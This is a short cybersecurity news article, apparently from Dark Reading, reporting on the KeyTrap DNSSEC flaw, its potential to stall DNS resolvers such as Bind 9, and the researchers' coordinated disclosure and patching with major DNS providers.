Although it's been sitting there since 2000, researchers were just recently able to suss out a fundamental design flaw in a Domain Name System security extension, which under certain circumstances could be exploited to take down wide expanses of the Internet.
DNS servers translate website URLs into IP addresses and, mostly invisibly, carry all Internet traffic.
The team behind the discovery is from ATHENE National Research Center for Applied Cybersecurity in Germany.
According to their new report on the KeyTrap DNS bug, the researchers found that a single packet sent to a DNS server implementation using the DNSSEC extension to validate traffic could force the server into a resolution loop that causes it to consume all of its own computing power and stall.
If multiple DNS servers were exploited at the same time with KeyTrap, they could be downed at the same time, resulting in widespread Internet outages, according to the team of academics.
In testing, the length of time the DNS servers remained offline after an attack differed, but the report noted that Bind 9, the most widely deployed DNS implementation, could remain stalled for up to 16 hours.
According to the Internet Systems Consortium, which oversees DNS servers worldwide, 34% of DNS servers in North America use DNSSEC for authentication and are therefore vulnerable to this flaw.
The research team spent the past several months working with major DNS service providers, including Google and Cloudflare, to deploy necessary patches before making their work public.
The team noted the patches are only a temporary fix and that it is working to revise DNSSEC standards to fully rethink its design.
Fernando Montenegro, Omdia's senior principal analyst for cybersecurity, praises the researchers for disclosing the flaw in close coordination with the vendor ecosystem.
From here, its up to the service providers to find a path toward a permanent fix for affected DNS resolvers, he adds.
The ISC does not recommend administrators disable DNSSEC validation on DNS servers, even though it does resolve the issue.
For those running the open source DNS implementation Bind 9, the ICS has an update.
This Cyber News was published on www.darkreading.com. Publication date: Tue, 20 Feb 2024 18:35:09 +0000